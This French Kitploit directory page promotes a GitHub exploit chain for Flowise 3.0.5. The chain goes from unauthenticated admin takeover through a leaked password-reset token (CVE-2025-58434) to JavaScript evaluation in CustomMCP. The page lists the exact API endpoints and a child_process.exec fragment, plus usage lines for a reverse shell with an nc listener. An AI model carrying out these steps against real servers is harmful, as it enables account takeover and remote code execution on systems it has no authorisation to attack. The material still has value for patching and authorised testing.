Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-58434 — Chaîne d'exploitation pour Flowise 3.0.5 : prise de contrôle de compte non authentifiée via la divulgation du jeton de réinitialisation de mot de passe (CVE-2025-58434) enchaînée à l'évaluation JavaScript CustomMCP pour l'exécution de code à distance. | Kitploit
Outils/GitHubGitHub/r3vpwnx/cve-2025-58434
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationRed Teaming
GitHubr3vpwnx/cve-2025-58434

CVE-2025-58434

Chaîne d'exploitation pour Flowise 3.0.5 : prise de contrôle de compte non authentifiée via la divulgation du jeton de réinitialisation de mot de passe (CVE-2025-58434) enchaînée à l'évaluation JavaScript CustomMCP pour l'exécution de code à distance.

Voir le dépôt
il y a 20h 34mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-58434 - Prise de contrôle de compte non authentifiée Flowise, enchaînée avec une RCE CustomMCP

Deux problèmes Flowise 3.0.5, enchaînés :

  1. CVE-2025-58434 - divulgation du jeton de réinitialisation de mot de passe. POST /api/v1/account/forgot-password renvoie le tempToken de l'utilisateur cible directement dans la réponse JSON. Fournissez-le à POST /api/v1/account/reset-password pour définir un mot de passe connu pour n'importe quel compte, y compris le premier admin -> prise de contrôle totale de compte non authentifiée.
  2. Évaluation JavaScript côté serveur de mcpServerConfig CustomMCP. Avec une session et une clé API d'espace de travail (issues de l'étape 1), POST /api/v1/node-load-method/customMCP avec loadMethod=listActions évalue la chaîne mcpServerConfig comme JavaScript dans le processus Flowise, donnant une RCE . (Problème Flowise distinct utilisé ici uniquement pour transformer l'ATO en exécution de code ; aucun CVE attribué au moment de la rédaction.)
require('child_process').exec()

CVE : CVE-2025-58434

Prérequis

root@kitploit:~
python3 -m pip install requests

Utilisation

flowise_ato_foothold.py - chaîne complète (ATO -> clé API -> reverse shell CustomMCP)

root@kitploit:~
python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# ayez `nc -lvnp <LPORT>` prêt

flowise_customMCP_rce.py - RCE CustomMCP uniquement (nécessite une clé API)

root@kitploit:~
python3 flowise_customMCP_rce.py '<commande>' '<FLOWISE_API_KEY>'

Références

  • https://github.com/FlowiseAI/Flowise/security/advisories
  • NVD : CVE-2025-58434

Avertissement

Pour les tests de sécurité autorisés et l'éducation uniquement. Exécutez ceci uniquement contre des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite de tester.


Auteur : r3vpwnx

Télécharger l’outil